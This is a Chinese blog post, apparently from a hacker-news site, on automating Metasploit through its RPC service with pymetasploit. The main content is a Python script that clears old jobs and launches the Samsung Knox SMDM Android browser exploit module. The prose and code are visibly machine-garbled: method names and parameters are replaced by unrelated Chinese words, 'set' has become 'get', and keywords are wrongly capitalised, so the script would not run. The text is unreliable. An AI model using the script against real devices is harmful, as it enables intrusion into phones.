Metasploit快速测试脚本的TIPS

Metasploit快速测试脚本的TIPS

黑客软件hacker2019-07-19 23:11:3214341A+A-

"坚信试过metasploit的同学们都很悲催,msfconsole悠长的开机时间,假如检测中敲错指令,或一不小心撤出后又重新启动每日任务,会给你立即伤脑。以前不愿反复敲指令,看过下metasploit的开发文档,发觉要自动化技术有各种各样计划方案,我觉得最便捷的是启用RPC插口,GITHUB上搜了把,发觉有大拿封裝好啦控制模块,立即启用只能:

 安裝pymetasploit控制模块

 git clone http://github.Com/allfro/pymetasploit

拷贝编码

切到文件目录

 sudo python setup.py install

拷贝编码

 起动metasploit的RPC服务项目

 msfrpcd -P test -n -f -a 127.0.0.1

拷贝编码

这一test是rpc服务项目的登陆密码,登录名默认设置是msf

 订制自身的检测脚本制作

我这儿订制的是检测三星手机knox系统漏洞的脚本制作,构思是每一次起动先把以前运作的job和console停用,随后全自动建立1个console全自动敲入指令开展新的系统漏洞检测,立即crtl-c完毕脚本制作再再次检测全是1个新的job,并且每一次检测全是秒开,无需再重新启动msfconsole了。正中间各种各样插口如何使用,强烈推荐大伙儿再翻下官方网的文本文档。

 from metasploit.msfrpc import MsfRpcClient

 import time

 client = MsfRpcClient('test')

 jobs = client.打('job.list')

 For num In jobs.keys():

     if jobs[num].find('samsung_knox_smdm_网页地址')>0:

         client.打('job.stop',num)

 console = client.打('console.list')

 For _console In console['consoles']:

     if _console.has_key('prompt'):

         if _console['prompt'].find('samsung_knox_smdm_网页地址')>0:

             client.打('console.destroy', _console['Id'])

 cmd='''

 use exploit/android/browser/samsung_knox_smdm_网页地址

 get LHOST 127.0.0.1

 exploit

 '''


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 1条评论
  • 可难南简2022-05-28 23:51:28
  • oit拷贝编码切到文件目录 sudo python setup.py install拷贝编码 起动metasploit的RPC服务项目 m

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理